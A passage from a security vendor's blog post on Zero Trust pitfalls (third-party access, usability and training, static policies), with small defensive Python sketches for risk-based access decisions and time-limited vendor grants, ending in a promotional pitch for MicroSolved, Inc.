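    sensitive_resource: bool

def risk_score(ctx):
    """Add up hypothetical weights for each risky signal."""
    score = 0
    if not ctx.device_compliant:
        score += 40
    if not ctx.known_location:
        score += 20
    if ctx.behaviour_anomaly:
        score += 30
    if ctx.sensitive_resource:
        score += 10
    return score

def decide(ctx, step_up_at=30, deny_at=60):
    """Re-evaluated on every request, not just at login."""
    score = risk_score(ctx)
    if score >= deny_at:
        return "deny"
    if score >= step_up_at:
        return "step_up_mfa"
    return "allow"

routine = decide(AccessContext(True, True, False, False))
travelling = decide(AccessContext(True, False, False, True))
hijacked = decide(AccessContext(False, False, True, False))
```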

An organization’s security posture is only as strong as its weakest link, which often lies outside its direct control. Vendors, partners, and contractors are an integral part of modern business operations, but they also represent a significant and often overlooked attack vector.

Every third-party vendor with access to your network or data extends your attack surface. These external entities may not adhere to the same security standards, making them prime targets for attackers seeking a backdoor into your organization. In fact, a staggering 77% of all security breaches originated with a vendor or other third party, according to a Whistic report. Ignoring this risk is a critical oversight.

Granting vendors broad, persistent access—often through traditional VPNs—is a recipe for disaster. This approach provides them with the same level of implicit trust as an internal employee, allowing them to potentially access sensitive systems and data far beyond the scope of their legitimate needs. If a vendor’s network is compromised, that access becomes a direct conduit for an attacker into your environment.

Applying Zero Trust principles to third-party access is non-negotiable. Begin by conducting rigorous security assessments of all vendors before granting them access. Replace broad VPN access with granular, application-specific access controls that enforce the principle of least privilege. Each external user’s identity should be strictly verified, and their access should be limited to only the specific resources required for their role, for the minimum time necessary.
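Scoping vendor access to specific resources for a limited time can be modelled as explicit grants that expire. This is a minimal sketch with hypothetical names; in practice the grants would live in your access broker or PAM tool.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

@dataclass(frozen=True)
class VendorGrant:
    vendor_user: str
    resource: str
    expires_at: datetime

def may_access(grants, vendor_user, resource, now=None):
    """Allow only an exact user and resource match on a grant that has not expired."""
    now = now or datetime.now(timezone.utc)
    return any(
        g.vendor_user == vendor_user and g.resource == resource and now < g.expires_at
        for g in grants
    )

# Hypothetical four-hour maintenance window for one vendor engineer.
issued = datetime(2025, 3, 4, 9, 0, tzinfo=timezone.utc)
grants = [VendorGrant("hvac-tech@vendor.example", "building-mgmt-console", issued + timedelta(hours=4))]

during = may_access(grants, "hvac-tech@vendor.example", "building-mgmt-console", now=issued + timedelta(hours=1))
after = may_access(grants, "hvac-tech@vendor.example", "building-mgmt-console", now=issued + timedelta(hours=5))
other = may_access(grants, "hvac-tech@vendor.example", "payroll-db", now=issued + timedelta(hours=1))
```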

A Zero Trust implementation can be technically perfect but fail completely if it ignores the human element. Security measures that are overly complex or disruptive to workflows will inevitably be circumvented by users focused on productivity.

If security policies introduce excessive friction—such as constant, unnecessary authentication prompts or blocked access to legitimate tools—employees will find ways around them. This can lead to a resurgence of Shadow IT, where users adopt unsanctioned applications and services to get their work done, creating massive security blind spots. A successful Zero Trust strategy must balance security with usability.

Zero Trust is a technical framework, but it relies on users to be vigilant partners in security. Without proper training, employees may not understand their role in the new model. They may fall for sophisticated phishing attacks, which have reportedly increased by 1,265% with the rise of GenAI, and unknowingly hand attackers the initial credentials needed to start probing the Zero Trust defenses.

Strive to make the secure path the easy path. Implement solutions that leverage risk-based, adaptive authentication to minimize friction for low-risk activities while stepping up verification for sensitive actions. Invest in continuous security awareness training that educates employees on new threats and their responsibilities within the Zero Trust framework. When users understand the “why” behind the security policies and find them easy to follow, they become a powerful asset rather than a liability.
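To make the idea of risk-based, adaptive authentication more concrete, here is a minimal Python sketch. The signals, weights, and thresholds are illustrative assumptions rather than recommended values, and the names `AccessContext`, `risk_score`, and `required_verification` are hypothetical; commercial products weigh many more signals.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessContext:
    """Hypothetical signals describing one access request."""
    known_device: bool
    usual_location: bool
    sensitive_action: bool


def risk_score(ctx):
    """Add up simple, assumed weights for each risky signal."""
    score = 0
    if not ctx.known_device:
        score += 2
    if not ctx.usual_location:
        score += 1
    if ctx.sensitive_action:
        score += 2
    return score


def required_verification(ctx):
    """Map the score to a response: low risk passes without extra prompts,
    medium risk triggers step-up MFA, high risk is blocked for review."""
    score = risk_score(ctx)
    if score >= 4:
        return "deny_and_review"
    if score >= 2:
        return "step_up_mfa"
    return "allow"
```

Under these assumed weights, a routine request from a known device in a usual location passes with no extra prompt, while the same user performing a sensitive action is asked for additional verification. That is the balance the text describes: friction is applied where the risk is, not everywhere.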

The final critical blunder is viewing Zero Trust as a project with a defined endpoint. The threat landscape, technology stacks, and business needs are in a constant state of flux. A Zero Trust architecture that is not designed to adapt will quickly become obsolete and ineffective.

Attackers are constantly evolving their tactics. A security policy that is effective today may be easily bypassed tomorrow, and a static Zero Trust implementation fails to account for this reality. Without continuous monitoring, analysis, and refinement, security policies become stale, and new vulnerabilities in applications or workloads can go unnoticed, creating fresh gaps for exploitation. Automation matters here as well: organizations using security AI can identify and contain a data breach 80 days faster than those without it.

Successfully implementing a Zero Trust architecture is a transformative journey that demands strategic foresight and meticulous execution. The path is challenging, but by avoiding these critical blunders, organizations can build a resilient, adaptive security posture fit for the modern digital era.

The key takeaways are clear:

By proactively addressing these potential pitfalls, your organization can move beyond legacy security models and chart a confident course toward a future where trust is never assumed and every single access request is rigorously verified.

For expert guidance on implementing a resilient Zero Trust architecture tailored to your organization’s unique needs, consider reaching out to the team at MicroSolved, Inc. With decades of experience in information security and a proven track record of helping companies navigate complex security landscapes, MicroSolved, Inc. offers valuable insights and solutions to enhance your security posture.

Our team of seasoned experts is ready to assist you at any stage of your Zero Trust journey, from initial strategy development to continuous monitoring and refinement. Don’t hesitate to contact us for comprehensive security solutions that align with your business goals and operational requirements.

* AI tools were used as a research assistant for this content, but human moderation and writing are also included. The included images are AI-generated.